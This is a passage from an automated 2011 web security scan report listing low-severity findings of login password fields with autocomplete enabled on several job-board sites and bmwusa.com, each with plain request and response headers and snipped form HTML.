Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aerospacecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.8. http://www.agriculturalcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.agriculturalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.9. http://www.architecturecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.architecturecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.10. http://www.attorneyresume.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3oi3tsj2agglmdtggh0p0r2jo5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
</script>
                            <form name="formmainlogin" action="" method="POST" onsubmit="return LoginFrm()" style="margin:0px; padding:0px;">
           <input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<input type="text" name="clslogin_email" onfocus="focusval(this.value,'Email')" onblur="blurval('Email')" value="Email" size="12" class="input" maxlength="50">&nbsp;<input type="password" name="clslogin_password" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password" size="12" class="input" maxlength="16">&nbsp;<input type="image" src="http://www.attorneyresume.com/images/bt_login.gif" width="49" height="16" border="0" alt="Log In" align="absmiddle">
...[SNIP]...

11.11. http://www.attorneyresume.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=JDJ&utm_medium=Banner&utm_campaign=Benefits300x130\ HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=r9q6qsdbdd70iag34sigvpv7m2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
</script>
                            <form name="formmainlogin" action="" method="POST" onsubmit="return LoginFrm()" style="margin:0px; padding:0px;">
           <input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<input type="text" name="clslogin_email" onfocus="focusval(this.value,'Email')" onblur="blurval('Email')" value="Email" size="12" class="input" maxlength="50">&nbsp;<input type="password" name="clslogin_password" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password" size="12" class="input" maxlength="16">&nbsp;<input type="image" src="http://www.attorneyresume.com/images/bt_login.gif" width="49" height="16" border="0" alt="Log In" align="absmiddle">
...[SNIP]...

11.12. http://www.auditorcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.auditorcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.13. http://www.automotivecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.automotivecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.14. http://www.aviationcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aviationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.15. http://www.bilingualcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bilingualcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.16. http://www.biotechcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.biotechcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.17. http://www.bluecollarcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bluecollarcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.18. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:40 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:40 GMT;path=/
Content-Length: 212247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
<body id="ctl00_ctl00_ctl00_BodyTag">
<form name="aspnetForm" method="post" action="/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" onreset="if (window.setTimeout) window.setTimeout('VAM_OnReset(false);', 100);">
<div>
...[SNIP]...
<div class="signInInput">
                            <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword" type="password" maxlength="32" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbPassword" class="regTextBox" style="width:200px;" />
                           
                        </div>
...[SNIP]...
<td valign="middle">
                                               <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer" type="password" maxlength="50" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbMFAnswer" onkeypress="return(VAM_KeyPress(this, event))" onkeydown="return(VAM_OnKeyDown(this, event))" style="width:182px;" />
                                           </td>
...[SNIP]...

11.19. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

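The page contains a form with the following action URL:

https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword
ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer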

Request

GET /Secured/Content/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
